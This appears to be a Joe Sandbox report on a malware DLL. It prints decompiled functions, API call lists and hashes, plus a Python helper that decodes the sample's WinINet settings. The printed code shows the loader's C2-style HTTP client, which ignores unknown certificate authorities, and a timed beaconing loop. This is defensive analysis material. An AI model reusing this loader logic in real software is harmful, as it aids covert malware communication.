                            			// +0x14 hConnect, +0x18 hRequest, +0x1c completion event (offsets as used below).
                            			E04A17AF1(void* __eax, void* __ecx, long __esi, char* _a4) {
                            				void _v8;
                            				long _v12;
                            				void _v16;
                            				void* _t34;
                            				void* _t38;
                            				void* _t40;
                            				char* _t56;
                            				long _t57;
                            				void* _t58;
                            				intOrPtr _t59;
                            				long _t65;
                            
                            				_t65 = __esi;
                            				_t58 = __ecx;
                            				_v16 = 0xea60; // 60000 ms, applied below as both send and receive timeout
                            				__imp__( *(__esi + 4)); // lstrlen(path), see the API list below
                            				_v12 = __eax + __eax;
                            				_t56 = E04A16D63(__eax + __eax + 1); // heap allocation (RtlAllocateHeap in the subcall)
                            				if(_t56 != 0) {
                            					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
                            						E04A16C2C(_t56); // free the buffer on failure (RtlFreeHeap in the subcall)
                            					} else {
                            						E04A16C2C( *(__esi + 4));
                            						 *(__esi + 4) = _t56; // replace the path with its canonicalised form
                            					}
                            				}
                            				// _a4 = user agent; 0 = INTERNET_OPEN_TYPE_PRECONFIG (system proxy settings);
                            				// 0x10000000 = INTERNET_FLAG_ASYNC, so completion is signalled via the status callback
                            				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
                            				 *(_t65 + 0x10) = _t34;
                            				if(_t34 == 0 || InternetSetStatusCallback(_t34, E04A17A86) == 0xffffffff) { // 0xffffffff = INTERNET_INVALID_STATUS_CALLBACK
                            					L15:
                            					return GetLastError();
                            				} else {
                            					ResetEvent( *(_t65 + 0x1c));
                            					// port 0x50 = 80, 3 = INTERNET_SERVICE_HTTP, the context struct itself is the callback context
                            					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
                            					 *(_t65 + 0x14) = _t38;
                            					// 0x3e5 = ERROR_IO_PENDING: the async connect is in flight, wait up to 60 s on the event
                            					if(_t38 != 0 || GetLastError() == 0x3e5 && E04A16E40( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
                            						_t59 =  *0x4a1a348; // 0xb1d5a8
                            						_t15 = _t59 + 0x4a1b73b; // 0x544547 = "GET" (little-endian ASCII)
                            						// 0x84404000 = INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE |
                            						//              INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
                            						_v8 = 0x84404000;
                            						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
                            						 *(_t65 + 0x18) = _t40;
                            						if(_t40 == 0) {
                            							goto L15;
                            						}
                            						_t57 = 4; // sizeof(DWORD)
                            						_v12 = _t57;
                            						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) { // 0x1f = INTERNET_OPTION_SECURITY_FLAGS
                            							_v8 = _v8 | 0x00000100; // SECURITY_FLAG_IGNORE_UNKNOWN_CA: certificate chains from untrusted CAs are accepted
                            							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
                            						}
                            						// 6 = INTERNET_OPTION_RECEIVE_TIMEOUT, 5 = INTERNET_OPTION_SEND_TIMEOUT, both 60000 ms
                            						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
                            							goto L15;
                            						} else {
                            							return 0;
                            						}
                            					} else {
                            						goto L15;
                            					}
                            				}
                            			}

                            Instruction addresses for the listing above (one entry per statement line, in listing order; 0x00000000 marks lines that emit no code):
                            0x04a17af1, 0x04a17af1, 0x04a17afc, 0x04a17b03, 0x04a17b0b, 0x04a17b15, 0x04a17b1b, 0x04a17b2e, 0x04a17b3e, 0x04a17b30,
                            0x04a17b33, 0x04a17b38, 0x04a17b38, 0x04a17b2e, 0x04a17b4e, 0x04a17b54, 0x04a17b59, 0x04a17c42, 0x00000000, 0x04a17b74,
                            0x04a17b77, 0x04a17b8a, 0x04a17b90, 0x04a17b95, 0x04a17bbd, 0x04a17bd0, 0x04a17bda, 0x04a17bdd, 0x04a17be3, 0x04a17be8,
                            0x00000000, 0x00000000, 0x04a17bec, 0x04a17bf8, 0x04a17c09, 0x04a17c0b, 0x04a17c1c, 0x04a17c1c, 0x04a17c2c, 0x00000000,
                            0x04a17c3e, 0x00000000, 0x04a17c3e, 0x00000000, 0x00000000, 0x00000000, 0x04a17b95

                            APIs
                            • lstrlen.KERNEL32(?,00000008,761B4D40), ref: 04A17B03
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 04A17B26
                            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 04A17B4E
                            • InternetSetStatusCallback.WININET(00000000,04A17A86), ref: 04A17B65
                            • ResetEvent.KERNEL32(?), ref: 04A17B77
                            • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 04A17B8A
                            • GetLastError.KERNEL32 ref: 04A17B97
                            • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 04A17BDD
                            • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 04A17BFB
                            • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 04A17C1C
                            • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 04A17C28
                            • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 04A17C38
                            • GetLastError.KERNEL32 ref: 04A17C42
                              • Part of subcall function 04A16C2C: RtlFreeHeap.NTDLL(00000000,00000000,04A15E1D,00000000,?,?,00000000), ref: 04A16C38
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                            • String ID:
                            • API String ID: 2290446683-0
                            • Opcode ID: 47c29439682467225a380820a4027f2d6e246698d311b3b16081147074b26f61
                            • Instruction ID: d45ba47f23c091d50f3748c5e7ecd7307264f7973a830cb24325b86ea54c2bbb
                            • Opcode Fuzzy Hash: 47c29439682467225a380820a4027f2d6e246698d311b3b16081147074b26f61
                            • Instruction Fuzzy Hash: 3241DF75500644BFEB319FA1DD49E6B7BBEEB95B00F105928F503E20B0E734AA41CB20
                            Uniqueness

                            Uniqueness Score: -1.00%
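
The API list for E04A17AF1 spells out how this sample's WinINet client is configured, but the flag values are only readable with wininet.h in hand. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses the report's own "• Func.MODULE(args), ref: ADDR" bullet format and decodes the WinINet constants into symbolic names. The sample lines are transcribed from the E04A17AF1 API list above, and the constant tables carry the wininet.h values. One assumption is stated in the code: for InternetSetOptionA the sandbox prints the DWORD the buffer points at (0000EA60, 00000100) rather than the pointer, so that field is decoded as the option value.

```python
import re
from typing import Optional

# Joe Sandbox "APIs" bullet: "• Func.MODULE(arg0,arg1,...), ref: ADDR". Arguments are hex
# DWORDs or '?' when unresolved. Subcall lines carry a "Part of subcall function X:" prefix.
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Constants from wininet.h.
INTERNET_FLAG_ASYNC = 0x10000000
INTERNET_SERVICES = {1: "FTP", 2: "GOPHER", 3: "HTTP"}
HTTP_OPEN_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE", 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT", 0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00008000: "INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP", 0x00004000: "INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID", 0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
INTERNET_OPTIONS = {2: "INTERNET_OPTION_CONNECT_TIMEOUT", 5: "INTERNET_OPTION_SEND_TIMEOUT",
                    6: "INTERNET_OPTION_RECEIVE_TIMEOUT", 0x1F: "INTERNET_OPTION_SECURITY_FLAGS"}
SECURITY_FLAGS = {
    0x00000080: "SECURITY_FLAG_IGNORE_REVOCATION", 0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00000200: "SECURITY_FLAG_IGNORE_WRONG_USAGE", 0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
}


def parse_api_line(line: str) -> Optional[dict]:
    """Parse one API bullet into func/module/args/ref; None for any other report line."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = []
    if m.group("args"):
        for tok in m.group("args").split(","):
            tok = tok.strip()
            args.append(None if tok == "?" else int(tok, 16))
    parent = m.group("parent")
    return {"func": m.group("func"), "module": m.group("module"), "args": args,
            "ref": int(m.group("ref"), 16), "parent": int(parent, 16) if parent else None}


def decode_flags(value: int, table: dict) -> list:
    """Expand a bitmask into symbolic names; bits not in the table are kept as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    known = 0
    for bit in table:
        known |= bit
    rest = value & ~known & 0xFFFFFFFF
    if rest:
        names.append(hex(rest))
    return names


def dword_to_ascii(value: int) -> str:
    """Render a DWORD the sandbox printed for a string pointer (0x544547 -> 'GET')."""
    return value.to_bytes(4, "little").rstrip(b"\0").decode("ascii", "replace")


def summarize_wininet(lines) -> dict:
    """Reduce a Joe Sandbox API list to the security-relevant WinINet client settings."""
    s = {"async": False, "status_callback": None, "port": None, "service": None, "verb": None,
         "request_flags": [], "security_flags": [], "timeouts_ms": {}}
    for c in filter(None, map(parse_api_line, lines)):
        f, a = c["func"], c["args"]
        if f == "InternetOpenA" and len(a) >= 5 and a[4] is not None:
            s["async"] = bool(a[4] & INTERNET_FLAG_ASYNC)
        elif f == "InternetSetStatusCallback" and len(a) >= 2:
            s["status_callback"] = a[1]
        elif f == "InternetConnectA" and len(a) >= 6:
            s["port"] = a[2]
            s["service"] = INTERNET_SERVICES.get(a[5], a[5])
        elif f == "HttpOpenRequestA" and len(a) >= 7:
            s["verb"] = dword_to_ascii(a[1]) if a[1] is not None else None
            s["request_flags"] = decode_flags(a[6], HTTP_OPEN_FLAGS)
        elif f == "InternetSetOptionA" and len(a) >= 4 and a[1] is not None:
            # Assumption: the sandbox prints the DWORD behind lpBuffer, not the pointer,
            # as the 0000EA60 / 00000100 values in the list above show.
            opt, val = a[1], a[2]
            if opt == 0x1F and val is not None:
                s["security_flags"] = decode_flags(val, SECURITY_FLAGS)
            elif opt in (2, 5, 6):
                s["timeouts_ms"][INTERNET_OPTIONS[opt]] = val
    s["accepts_untrusted_cert"] = "SECURITY_FLAG_IGNORE_UNKNOWN_CA" in s["security_flags"]
    return s


# Sample input: the E04A17AF1 API list transcribed from the report section above.
SAMPLE_API_LINES = [
    "• lstrlen.KERNEL32(?,00000008,761B4D40), ref: 04A17B03",
    "  • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F",
    "• InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 04A17B26",
    "• InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 04A17B4E",
    "• InternetSetStatusCallback.WININET(00000000,04A17A86), ref: 04A17B65",
    "• ResetEvent.KERNEL32(?), ref: 04A17B77",
    "• InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 04A17B8A",
    "• GetLastError.KERNEL32 ref: 04A17B97",
    "• HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 04A17BDD",
    "• InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 04A17BFB",
    "• InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 04A17C1C",
    "• InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 04A17C28",
    "• InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 04A17C38",
    "• GetLastError.KERNEL32 ref: 04A17C42",
    "  • Part of subcall function 04A16C2C: RtlFreeHeap.NTDLL(00000000,00000000,04A15E1D,00000000,?,?,00000000), ref: 04A16C38",
]

if __name__ == "__main__":
    from pprint import pprint
    pprint(summarize_wininet(SAMPLE_API_LINES))
```

Run on the list above this yields an async, plain port-80 HTTP GET client with SECURITY_FLAG_IGNORE_UNKNOWN_CA set and 60 s send/receive timeouts; the same decoder can be pointed at any other function's API list in this report, and the untrusted-CA bit together with INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS is the setting worth carrying into a triage note for this loader.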

                            Control-flow Graph

                            control_flow_graph 243 4a17f35-4a17f9a 244 4a17fbb-4a17fe5 243->244 245 4a17f9c-4a17fb6 RaiseException 243->245 247 4a17fe7 244->247 248 4a17fea-4a17ff6 244->248 246 4a1816b-4a1816f 245->246 247->248 249 4a18009-4a1800b 248->249 250 4a17ff8-4a18003 248->250 251 4a18011-4a18018 249->251 252 4a180b3-4a180bd 249->252 250->249 258 4a1814e-4a18155 250->258 256 4a18028-4a18035 LoadLibraryA 251->256 257 4a1801a-4a18026 251->257 254 4a180c9-4a180cb 252->254 255 4a180bf-4a180c7 252->255 259 4a18149-4a1814c 254->259 260 4a180cd-4a180d0 254->260 255->254 261 4a18037-4a18047 GetLastError 256->261 262 4a18078-4a18084 InterlockedExchange 256->262 257->256 257->262 266 4a18157-4a18164 258->266 267 4a18169 258->267 259->258 269 4a180d2-4a180d5 260->269 270 4a180fe-4a1810c GetProcAddress 260->270 271 4a18057-4a18073 RaiseException 261->271 272 4a18049-4a18055 261->272 263 4a18086-4a1808a 262->263 264 4a180ac-4a180ad FreeLibrary 262->264 263->252 274 4a1808c-4a18098 LocalAlloc 263->274 264->252 266->267 267->246 269->270 275 4a180d7-4a180e2 269->275 270->259 273 4a1810e-4a1811e GetLastError 270->273 271->246 272->262 272->271 278 4a18120-4a18128 273->278 279 4a1812a-4a1812c 273->279 274->252 280 4a1809a-4a180aa 274->280 275->270 276 4a180e4-4a180ea 275->276 276->270 281 4a180ec-4a180ef 276->281 278->279 279->259 282 4a1812e-4a18146 RaiseException 279->282 280->252 281->270 283 4a180f1-4a180fc 281->283 282->259 283->259 283->270
                            C-Code - Quality: 51%
                            			// Structure matches the MSVC CRT delay-load helper (__delayLoadHelper2), statically
                            			// linked into the module: _a4 is the ImgDelayDescr (grAttrs, rvaDLLName, rvaHmod,
                            			// rvaIAT, rvaINT, rvaBoundIAT, rvaUnloadIAT, dwTimeStamp; RVAs rebased to 0x4a10000),
                            			// _v72 = 0x24 is sizeof(DelayLoadInfo), 0x4a1a1c0 / 0x4a1a1bc are the notify / failure
                            			// hook pointers (called with dliStartProcessing=0, dliNotePreLoadLibrary=1,
                            			// dliNotePreGetProcAddress=2, dliFailLoadLib=3, dliFailGetProc=4, dliNoteEndProcessing=5),
                            			// and the RaiseException codes are VcppException(ERROR_SEVERITY_ERROR, x) for
                            			// ERROR_INVALID_PARAMETER (0xc06d0057), ERROR_MOD_NOT_FOUND (0xc06d007e) and
                            			// ERROR_PROC_NOT_FOUND (0xc06d007f). Compiler runtime, not the sample's own logic.
                            			E04A17F35(long _a4, long _a8) {
                            				signed int _v8;
                            				intOrPtr _v16;
                            				LONG* _v28;
                            				long _v40;
                            				long _v44;
                            				long _v48;
                            				CHAR* _v52;
                            				long _v56;
                            				CHAR* _v60;
                            				long _v64;
                            				signed int* _v68;
                            				char _v72;
                            				signed int _t76;
                            				signed int _t80;
                            				signed int _t81;
                            				intOrPtr* _t82;
                            				intOrPtr* _t83;
                            				intOrPtr* _t85;
                            				intOrPtr* _t90;
                            				intOrPtr* _t95;
                            				intOrPtr* _t98;
                            				struct HINSTANCE__* _t99;
                            				void* _t102;
                            				intOrPtr* _t104;
                            				void* _t115;
                            				long _t116;
                            				void _t125;
                            				void* _t131;
                            				signed short _t133;
                            				struct HINSTANCE__* _t138;
                            				signed int* _t139;
                            
                            				_t139 = _a4;
                            				_v28 = _t139[2] + 0x4a10000;
                            				_t115 = _t139[3] + 0x4a10000;
                            				_t131 = _t139[4] + 0x4a10000;
                            				_v8 = _t139[7];
                            				_v60 = _t139[1] + 0x4a10000;
                            				_v16 = _t139[5] + 0x4a10000;
                            				_v64 = _a8;
                            				_v72 = 0x24;
                            				_v68 = _t139;
                            				_v56 = 0;
                            				asm("stosd");
                            				_v48 = 0;
                            				_v44 = 0;
                            				_v40 = 0;
                            				if(( *_t139 & 0x00000001) == 0) {
                            					_a8 =  &_v72;
                            					RaiseException(0xc06d0057, 0, 1,  &_a8);
                            					return 0;
                            				}
                            				_t138 =  *_v28;
                            				_t76 = _a8 - _t115 >> 2 << 2;
                            				_t133 =  *(_t131 + _t76);
                            				_a4 = _t76;
                            				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                            				_v56 = _t80;
                            				_t81 = _t133 + 0x4a10002;
                            				if(_t80 == 0) {
                            					_t81 = _t133 & 0x0000ffff;
                            				}
                            				_v52 = _t81;
                            				_t82 =  *0x4a1a1c0; // 0x0
                            				_t116 = 0;
                            				if(_t82 == 0) {
                            					L6:
                            					if(_t138 != 0) {
                            						L18:
                            						_t83 =  *0x4a1a1c0; // 0x0
                            						_v48 = _t138;
                            						if(_t83 != 0) {
                            							_t116 =  *_t83(2,  &_v72);
                            						}
                            						if(_t116 != 0) {
                            							L32:
                            							 *_a8 = _t116;
                            							L33:
                            							_t85 =  *0x4a1a1c0; // 0x0
                            							if(_t85 != 0) {
                            								_v40 = _v40 & 0x00000000;
                            								_v48 = _t138;
                            								_v44 = _t116;
                            								 *_t85(5,  &_v72);
                            							}
                            							return _t116;
                            						} else {
                            							if(_t139[5] == _t116 || _t139[7] == _t116) {
                            								L27:
                            								_t116 = GetProcAddress(_t138, _v52);
                            								if(_t116 == 0) {
                            									_v40 = GetLastError();
                            									_t90 =  *0x4a1a1bc; // 0x0
                            									if(_t90 != 0) {
                            										_t116 =  *_t90(4,  &_v72);
                            									}
                            									if(_t116 == 0) {
                            										_a4 =  &_v72;
                            										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                            										_t116 = _v44;
                            									}
                            								}
                            								goto L32;
                            							} else {
                            								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                            								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                            									_t116 =  *(_a4 + _v16);
                            									if(_t116 != 0) {
                            										goto L32;
                            									}
                            								}
                            								goto L27;
                            							}
                            						}
                            					}
                            					_t98 =  *0x4a1a1c0; // 0x0
                            					if(_t98 == 0) {
                            						L9:
                            						_t99 = LoadLibraryA(_v60); // executed
                            						_t138 = _t99;
                            						if(_t138 != 0) {
                            							L13:
                            							if(InterlockedExchange(_v28, _t138) == _t138) {
                            								FreeLibrary(_t138);
                            							} else {
                            								if(_t139[6] != 0) {
                            									_t102 = LocalAlloc(0x40, 8);
                            									if(_t102 != 0) {
                            										 *(_t102 + 4) = _t139;
                            										_t125 =  *0x4a1a1b8; // 0x0
                            										 *_t102 = _t125;
                            										 *0x4a1a1b8 = _t102;
                            									}
                            								}
                            							}
                            							goto L18;
                            						}
                            						_v40 = GetLastError();
                            						_t104 =  *0x4a1a1bc; // 0x0
                            						if(_t104 == 0) {
                            							L12:
                            							_a8 =  &_v72;
                            							RaiseException(0xc06d007e, 0, 1,  &_a8);
                            							return _v44;
                            						}
                            						_t138 =  *_t104(3,  &_v72);
                            						if(_t138 != 0) {
                            							goto L13;
                            						}
                            						goto L12;
                            					}
                            					_t138 =  *_t98(1,  &_v72);
                            					if(_t138 != 0) {
                            						goto L13;
                            					}
                            					goto L9;
                            				}
                            				_t116 =  *_t82(0,  &_v72);
                            				if(_t116 != 0) {
                            					goto L33;
                            				}
                            				goto L6;
                            			}

                            Instruction addresses for the listing above (one entry per statement line, in listing order; 0x00000000 marks lines that emit no code):
                            0x04a17f44, 0x04a17f5a, 0x04a17f60, 0x04a17f62, 0x04a17f67, 0x04a17f6d, 0x04a17f72, 0x04a17f75, 0x04a17f83, 0x04a17f8a,
                            0x04a17f8d, 0x04a17f90, 0x04a17f91, 0x04a17f94, 0x04a17f97, 0x04a17f9a, 0x04a17f9f, 0x04a17fae, 0x00000000, 0x04a17fb4,
                            0x04a17fbe, 0x04a17fc8, 0x04a17fcd, 0x04a17fcf, 0x04a17fd9, 0x04a17fdc, 0x04a17fdf, 0x04a17fe5, 0x04a17fe7, 0x04a17fe7,
                            0x04a17fea, 0x04a17fed, 0x04a17ff2, 0x04a17ff6, 0x04a18009, 0x04a1800b, 0x04a180b3, 0x04a180b3, 0x04a180ba, 0x04a180bd,
                            0x04a180c7, 0x04a180c7, 0x04a180cb, 0x04a18149, 0x04a1814c, 0x04a1814e, 0x04a1814e, 0x04a18155, 0x04a18157, 0x04a18161,
                            0x04a18164, 0x04a18167, 0x04a18167, 0x00000000, 0x04a180cd, 0x04a180d0, 0x04a180fe, 0x04a18108, 0x04a1810c, 0x04a18114,
                            0x04a18117, 0x04a1811e, 0x04a18128, 0x04a18128, 0x04a1812c, 0x04a18131, 0x04a18140, 0x04a18146, 0x04a18146, 0x04a1812c,
                            0x00000000, 0x04a180d7, 0x04a180da, 0x04a180e2, 0x04a180f7, 0x04a180fc, 0x00000000, 0x00000000, 0x04a180fc, 0x00000000,
                            0x04a180e2, 0x04a180d0, 0x04a180cb, 0x04a18011, 0x04a18018, 0x04a18028, 0x04a1802b, 0x04a18031, 0x04a18035, 0x04a18078,
                            0x04a18084, 0x04a180ad, 0x04a18086, 0x04a1808a, 0x04a18090, 0x04a18098, 0x04a1809a, 0x04a1809d, 0x04a180a3, 0x04a180a5,
                            0x04a180a5, 0x04a18098, 0x04a1808a, 0x00000000, 0x04a18084, 0x04a1803d, 0x04a18040, 0x04a18047, 0x04a18057, 0x04a1805a,
                            0x04a1806a, 0x00000000, 0x04a18070, 0x04a18051, 0x04a18055, 0x00000000, 0x00000000, 0x00000000, 0x04a18055, 0x04a18022,
                            0x04a18026, 0x00000000, 0x00000000, 0x00000000, 0x04a18026, 0x04a17fff, 0x04a18003, 0x00000000, 0x00000000, 0x00000000

                            APIs
                            • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04A17FAE
                            • LoadLibraryA.KERNEL32(?), ref: 04A1802B
                            • GetLastError.KERNEL32 ref: 04A18037
                            • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04A1806A
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: ExceptionRaise$ErrorLastLibraryLoad
                            • String ID: $
                            • API String ID: 948315288-3993045852
                            • Opcode ID: e73d8ed49ba2bc79d1b34362d19d2863fcfb19fa48d25e450d499bd5728adb49
                            • Instruction ID: 0b64c8202e02e7dd2bb0c6329b055f2228b08481df35e35ffb17ca220372a522
                            • Opcode Fuzzy Hash: e73d8ed49ba2bc79d1b34362d19d2863fcfb19fa48d25e450d499bd5728adb49
                            • Instruction Fuzzy Hash: 08814D75A012099FEB20DFA8D980AAEB7F5FF58710F14802DE945E7360E778E945CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 285 4a1661d-4a1664f memset CreateWaitableTimerA 286 4a167d0-4a167d6 GetLastError 285->286 287 4a16655-4a166ae _allmul SetWaitableTimer WaitForMultipleObjects 285->287 288 4a167da-4a167e4 286->288 289 4a166b4-4a166b7 287->289 290 4a16738-4a1673e 287->290 291 4a166c2 289->291 292 4a166b9 call 4a1216c 289->292 293 4a1673f-4a16743 290->293 294 4a166cc 291->294 299 4a166be-4a166c0 292->299 296 4a16753-4a16757 293->296 297 4a16745-4a1674d RtlFreeHeap 293->297 298 4a166d0-4a166d5 294->298 296->293 300 4a16759-4a16763 FindCloseChangeNotification 296->300 297->296 301 4a166d7-4a166de 298->301 302 4a166e8-4a16715 call 4a143eb 298->302 299->291 299->294 300->288 301->302 303 4a166e0 301->303 306 4a16765-4a1676a 302->306 307 4a16717-4a16722 302->307 303->302 308 4a16789-4a16791 306->308 309 4a1676c-4a16772 306->309 307->298 310 4a16724-4a1672f call 4a170d8 307->310 312 4a16797-4a167c5 _allmul SetWaitableTimer WaitForMultipleObjects 308->312 309->290 311 4a16774-4a16787 call 4a1561e 309->311 316 4a16734 310->316 311->312 312->298 315 4a167cb 312->315 315->290 316->290
                            C-Code - Quality: 83%
                            			E04A1661D(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                            				void _v48;
                            				long _v52;
                            				struct %anon52 _v60;
                            				char _v72;
                            				long _v76;
                            				void* _v80;
                            				union _LARGE_INTEGER _v84;
                            				struct %anon52 _v92;
                            				void* _v96;
                            				void* _v100;
                            				union _LARGE_INTEGER _v104;
                            				long _v108;
                            				struct %anon52 _v124;
                            				long _v128;
                            				struct %anon52 _t46;
                            				void* _t51;
                            				long _t53;
                            				void* _t54;
                            				struct %anon52 _t61;
                            				long _t65;
                            				struct %anon52 _t66;
                            				intOrPtr _t68;
                            				void* _t69;
                            				void* _t73;
                            				signed int _t74;
                            				void* _t76;
                            				void* _t78;
                            				void** _t82;
                            				signed int _t86;
                            				void* _t89;
                            
                            				_t76 = __edx;
                            				_v52 = 0;
                            				memset( &_v48, 0, 0x2c);
                            				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                            				_t46 = CreateWaitableTimerA(0, 1, 0);
                            				_v60 = _t46;
                            				if(_t46 == 0) {
                            					_v92.HighPart = GetLastError();
                            				} else {
                            					_push(0xffffffff);
                            					_push(0xff676980);
                            					_push(0);
                            					_push( *0x4a1a2e0);
                            					_v76 = 0;
                            					_v80 = 0;
                            					L04A1824A();
                            					_v84.LowPart = _t46;
                            					_v80 = _t76;
                            					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                            					_t51 =  *0x4a1a30c; // 0x2c0
                            					_v76 = _t51;
                            					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                            					_v108 = _t53;
                            					if(_t53 == 0) {
                            						if(_a8 != 0) {
                            							L4:
                            							 *0x4a1a2ec = 5;
                            						} else {
                            							_t69 = E04A1216C(_t76); // executed
                            							if(_t69 != 0) {
                            								goto L4;
                            							}
                            						}
                            						_v104.LowPart = 0;
                             						L6:
                            						if(_v104.LowPart == 1 && ( *0x4a1a300 & 0x00000001) == 0) {
                            							_v104.LowPart = 2;
                            						}
                            						_t74 = _v104.LowPart;
                            						_t58 = _t74 << 4;
                            						_t78 = _t89 + (_t74 << 4) + 0x38;
                            						_t75 = _t74 + 1;
                            						_v92.LowPart = _t74 + 1;
                            						_t61 = E04A143EB( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
                            						_v124 = _t61;
                            						if(_t61 != 0) {
                            							goto L17;
                            						}
                            						_t66 = _v92;
                            						_v104.LowPart = _t66;
                            						if(_t66 != 3) {
                            							goto L6;
                            						} else {
                            							_t68 = E04A170D8(_t75,  &_v72, _a4, _a8); // executed
                            							_v124.HighPart = _t68;
                            						}
                            						goto L12;
                            						L17:
                            						__eflags = _t61 - 0x10d2;
                            						if(_t61 != 0x10d2) {
                            							_push(0xffffffff);
                            							_push(0xff676980);
                            							_push(0);
                            							_push( *0x4a1a2e4);
                            							goto L21;
                            						} else {
                            							__eflags =  *0x4a1a2e8; // 0x0
                            							if(__eflags == 0) {
                            								goto L12;
                            							} else {
                            								_t61 = E04A1561E();
                            								_push(0xffffffff);
                            								_push(0xdc3cba00);
                            								_push(0);
                            								_push( *0x4a1a2e8);
                            								L21:
                            								L04A1824A();
                            								_v104.LowPart = _t61;
                            								_v100 = _t78;
                            								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
